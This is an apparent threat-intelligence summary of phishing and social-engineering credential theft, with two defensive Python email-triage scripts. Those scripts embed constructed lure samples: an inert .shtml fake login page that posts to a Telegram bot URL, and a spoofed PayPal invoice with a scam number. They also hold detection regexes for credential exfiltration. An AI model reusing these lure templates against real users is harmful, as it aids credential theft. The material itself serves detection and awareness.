Mallory

Credential Theft via Phishing and Social Engineering Techniques

Tags: credential theft, credential harvesting, credential stuffing, phishing emails, phishing, password reuse, social engineering, email compromise, scam messages, security awareness, stolen devices, fake websites, user credentials, malicious attachments, attack vectors

Updated November 11, 2025 at 03:00 PM · 2 sources

Get Ahead of Threats Like This

Know if you're exposed — before adversaries strike.

Attackers are increasingly leveraging simple yet effective phishing and social engineering tactics to steal user credentials. One observed method involves sending phishing emails with malicious attachments, such as .shtml files, that present fake login screens to unsuspecting victims. These screens are designed to capture any credentials entered and immediately transmit them to attackers via Telegram bots, making detection and takedown more difficult. The phishing campaigns often use compromised legitimate email accounts and minimal social engineering, relying on the likelihood of password reuse across multiple sites to maximize the value of stolen credentials.
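The attachment pattern described above (an HTML-type file such as .shtml that renders a login form when opened locally and sends whatever is typed to a Telegram bot) can be triaged at the mail gateway before anyone opens it. The Python script below is an added example written for this page, not code from Mallory or from either of its sources. The indicator patterns, the severity scale and the sample message are assumptions; the embedded attachment is deliberately inert (placeholder token, no working submission logic) and exists only as constructed test input for the detector.

```python
"""Gateway triage for HTML-type attachments that look like credential-capture pages.

Added example for this page (not from Mallory or its sources). Indicator patterns,
severity scale and the sample message are assumptions made for illustration.
"""
import re
from email import message_from_string, policy
from email.message import EmailMessage

# Extensions a browser renders as HTML when the file is opened from disk.
# .shtml is a server-side-include page on a web server, but opened locally it is
# plain HTML, which is why it slips past naive ".html attachment" rules.
HTML_EXTENSIONS = (".html", ".htm", ".shtml", ".xhtml")

# Assumed indicators: a password field means the page collects credentials;
# a Bot API reference means the page can push them straight to Telegram.
PASSWORD_FIELD = re.compile(r'<input[^>]*type\s*=\s*["\']?password', re.I)
TELEGRAM_BOT_API = re.compile(r'api\.telegram\.org/bot', re.I)
URL_HOST = re.compile(r'https?://([A-Za-z0-9.-]+)', re.I)


def html_attachments(msg: EmailMessage):
    """Yield (filename, decoded text) for every attachment that will render as HTML."""
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        is_html_type = part.get_content_type() in ("text/html", "application/xhtml+xml")
        if name.lower().endswith(HTML_EXTENSIONS) or is_html_type:
            payload = part.get_payload(decode=True) or b""
            yield name, payload.decode("utf-8", errors="replace")


def severity(findings, hosts):
    """Assumed scale: credential form + Telegram exfil is the strongest signal."""
    if "password input field" in findings and "Telegram Bot API reference" in findings:
        return "high"
    if "password input field" in findings and hosts:
        return "medium"
    if findings or hosts:
        return "low"
    return "none"


def analyze_attachment(name, html):
    findings = []
    if PASSWORD_FIELD.search(html):
        findings.append("password input field")
    if TELEGRAM_BOT_API.search(html):
        findings.append("Telegram Bot API reference")
    # Every remote host the page talks to; a local login page should talk to none.
    hosts = sorted({h.lower() for h in URL_HOST.findall(html)})
    return {"name": name, "findings": findings, "hosts": hosts,
            "severity": severity(findings, hosts)}


def triage(raw_message: str):
    """Parse a raw RFC 5322 message and score each HTML-type attachment."""
    msg = message_from_string(raw_message, policy=policy.default)
    results = [analyze_attachment(n, h) for n, h in html_attachments(msg)]
    worst = max((r["severity"] for r in results), default="none",
                key=["none", "low", "medium", "high"].index)
    return {"attachments": results, "verdict": worst}


def build_sample_email() -> str:
    """Constructed sample: an invoice lure carrying an inert .shtml attachment."""
    msg = EmailMessage()
    msg["From"] = "accounts@example.com"
    msg["To"] = "recipient@example.org"
    msg["Subject"] = "Invoice attached"
    msg.set_content("Please review the attached invoice.")
    page = (
        '<html><body><form id="login">'
        '<input type="email" name="u"><input type="password" name="p"></form>'
        '<script>fetch("https://api.telegram.org/botPLACEHOLDER/sendMessage");</script>'
        "</body></html>"
    )
    msg.add_attachment(page.encode(), maintype="application",
                       subtype="octet-stream", filename="invoice.shtml")
    return msg.as_string()


if __name__ == "__main__":
    report = triage(build_sample_email())
    for att in report["attachments"]:
        print(att["name"], att["severity"], att["findings"], att["hosts"])
    print("verdict:", report["verdict"])
```

The check keys on what the file does when rendered, not on its extension alone, so renaming the lure to .htm or .xhtml, or labelling it `application/octet-stream` as the sample does, still produces a finding.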

Another prevalent technique targets iPhone owners whose devices have been lost or stolen. Scammers exploit the contact information displayed on the device's lock screen to send convincing messages that mimic Apple's Find My service, tricking victims into entering their Apple ID credentials on fake websites. With these credentials, attackers can unlock, wipe, and resell the devices, as well as access sensitive personal data. These attacks highlight the ongoing evolution of credential theft tactics, emphasizing the need for vigilance against both low-sophistication phishing and more targeted social engineering schemes.

Related Stories

Phishing Campaigns Abuse Trusted Platforms and Legitimate Workflows to Evade Detection

Multiple campaigns are abusing *legitimate* cloud and platform workflows to make phishing and fraud harder to detect. Attackers are generating real Apple and PayPal invoice/dispute emails and embedding scam phone numbers in user-controlled fields (e.g., “seller notes”), resulting in messages that carry valid **DKIM** signatures and originate from high-reputation domains; this “**DKIM replay**” style abuse bypasses many email controls because authentication validates the sender domain, not the safety of the embedded content. In parallel, threat actors are leveraging free **Google Firebase** developer accounts to host brand-mimicking phishing pages on trusted `firebaseapp.com` / `web.app` subdomains, increasing delivery and click-through rates by exploiting domain reputation and common allowlisting of Google infrastructure.

A separate but related social-engineering technique targets **Telegram** users by manipulating Telegram’s official authentication workflows to obtain fully authorized sessions rather than simply stealing passwords. Victims are lured to Telegram-lookalike pages (often on ephemeral domains) that prompt QR scanning or phone-number entry; user interaction triggers a real login attempt initiated by the attacker, and once the victim approves the authorization prompt on their device, the attacker gains persistent account access and can pivot to follow-on attacks via the victim’s contacts.

These incidents collectively highlight a shift toward “living off trusted services,” where adversaries avoid compromising vendors and instead weaponize legitimate features, trusted domains, and sanctioned authentication flows to reduce detection and increase victim compliance.
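The point that DKIM validates the signing domain rather than the message content suggests a second-stage check that runs only after authentication has passed: does a brand-authenticated invoice carry a callback phone number in its body, or link to a brand-named subdomain on free hosting such as `firebaseapp.com` / `web.app`? The script below is an added example for this page, not code from Mallory or the sources it summarises. The header parsing uses the standard `Authentication-Results` format; the phone-number pattern, the brand watchlist, the free-hosting suffix list and the sample message are assumptions made for illustration.

```python
"""Post-authentication content checks for DKIM-replay-style lures.

Added example for this page (not from Mallory or its sources). The watchlists,
regexes and the constructed sample message are assumptions.
"""
import re
from email import message_from_string, policy
from email.message import EmailMessage

# Pulls "dkim=<result> ... header.d=<domain>" out of an Authentication-Results header.
AUTH_RESULTS_DKIM = re.compile(r"dkim=(\w+)[^;]*?header\.d=([A-Za-z0-9.-]+)", re.I)
# North-American style numbers; widen for other regions (assumption).
PHONE = re.compile(r"(?:\+?1[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)

# Free hosting where anyone can register a brand-sounding subdomain (page names these).
FREE_HOSTING_SUFFIXES = (".firebaseapp.com", ".web.app")
# Assumed watchlist of brands the organisation wants to protect its users from.
BRAND_KEYWORDS = ("apple", "paypal", "microsoft", "telegram")


def dkim_result(msg: EmailMessage):
    """Return (result, signing_domain) from the first Authentication-Results header."""
    for value in msg.get_all("Authentication-Results", []):
        match = AUTH_RESULTS_DKIM.search(value)
        if match:
            return match.group(1).lower(), match.group(2).lower()
    return None, None


def body_text(msg: EmailMessage) -> str:
    body = msg.get_body(preferencelist=("plain", "html"))
    return body.get_content() if body else ""


def lookalike_hosts(text: str):
    """Hosts on free hosting whose subdomain borrows a watched brand name."""
    hosts = {h.lower() for h in URL_HOST.findall(text)}
    return sorted(h for h in hosts
                  if h.endswith(FREE_HOSTING_SUFFIXES)
                  and any(brand in h for brand in BRAND_KEYWORDS))


def assess(raw_message: str):
    """DKIM pass is treated as a reason to look harder at the content, not less."""
    msg = message_from_string(raw_message, policy=policy.default)
    result, domain = dkim_result(msg)
    text = body_text(msg)
    phones = PHONE.findall(text)
    hosts = lookalike_hosts(text)
    reasons = []
    if result == "pass" and phones:
        reasons.append(f"DKIM-authenticated mail from {domain} carries callback number(s)")
    if hosts:
        reasons.append("brand keyword on free-hosting subdomain: " + ", ".join(hosts))
    return {"dkim": result, "dkim_domain": domain, "phones": phones,
            "lookalike_hosts": hosts, "reasons": reasons}


def build_sample_invoice_email() -> str:
    """Constructed sample: a genuine-looking invoice whose seller notes hold the scam."""
    msg = EmailMessage()
    msg["From"] = "service@paypal.com"
    msg["To"] = "recipient@example.org"
    msg["Subject"] = "Invoice from Seller"
    # Constructed header; a real one is added by the receiving MTA, not the sender.
    msg["Authentication-Results"] = (
        "mx.example.org; dkim=pass header.d=paypal.com header.s=sample "
        "header.b=CONSTRUCTED; spf=pass smtp.mailfrom=paypal.com"
    )
    msg.set_content(
        "Your invoice for $499.00 has been issued.\n"
        "Seller notes: if you did not authorize this charge call (555) 010-0199 "
        "immediately. Manage the dispute at "
        "https://paypal-dispute-center.web.app/login\n"
    )
    return msg.as_string()


if __name__ == "__main__":
    verdict = assess(build_sample_invoice_email())
    print(verdict["dkim"], verdict["dkim_domain"])
    for reason in verdict["reasons"]:
        print("-", reason)
```

A message that passes this check is still only "not obviously a replay lure"; the value of the heuristic is that it fires precisely where reputation-based filtering is blind, on mail the brand really did sign.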

1 month ago

Social Engineering Scams Exploiting Mobile Device Features to Steal Credentials and Funds

Cybercriminals are increasingly leveraging built-in features of popular mobile platforms to execute sophisticated social engineering scams aimed at stealing sensitive credentials and financial assets. On WhatsApp, scammers exploit the screen-sharing function by impersonating trusted entities such as bank employees or support agents, coercing victims into sharing their screens under the pretense of resolving urgent security issues. This access enables attackers to view and capture one-time passwords (OTPs), banking details, and other personal information, resulting in significant financial losses. In response, Meta has introduced AI-powered safety tools, including real-time warnings when users attempt to share their screens with unknown contacts, to mitigate these attacks.

Similarly, iPhone users are being targeted through phishing campaigns that exploit the "Find My" feature. After a device is lost or stolen, scammers send convincing fake messages—purportedly from Apple Support—containing links that claim to help locate the missing phone. By leveraging accurate device details and the victim's sense of urgency, attackers trick users into divulging their Apple ID credentials, potentially granting full access to personal data and accounts. Authorities such as Switzerland’s National Cyber Security Centre have issued warnings about these tactics, emphasizing the need for heightened vigilance when responding to unsolicited messages related to lost devices.

4 months ago

Email-Borne Social Engineering and Credential Theft Risk

Recent coverage emphasized that **phishing and social engineering via email** remain a primary initial access vector, with attackers increasingly blending into routine workflows (emails, meeting invites, and trusted SaaS notifications). TechTarget highlighted that user judgment is often the last control when filters fail, citing the *Microsoft Digital Defense Report 2025* claim that **28% of breaches** trace back to phishing/social engineering, and noting reports of spam relayed through **legitimate Zendesk domains/instances** (e.g., leveraging recognizable brands) to bypass filtering and drive credential theft or follow-on access. Separate reporting and guidance reinforced how attackers operationalize these patterns: The Hacker News described **Operation Nomad Leopard**, a spear-phishing campaign targeting Afghan government entities using government-themed decoys and a **GitHub-hosted ISO** that drops a **LNK** to execute a **FALSECUB** backdoor capable of remote command execution. Other items in the set were largely general best-practice or “common threats” explainers (password hygiene, generic threat overviews) rather than incident-specific intelligence, but they align with the same overarching risk theme: weak/reused passwords and routine email behaviors continue to enable account takeover and downstream compromise.

1 month ago
